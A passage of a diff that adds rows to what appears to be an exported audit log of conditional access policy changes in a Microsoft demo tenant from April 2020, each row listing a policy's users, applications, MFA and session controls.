+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:48 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:48 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:48 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:47Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:47 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:47Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:47 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:48 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:50Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:14 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:14 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-24T03:12:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T03:12:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 3:12:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
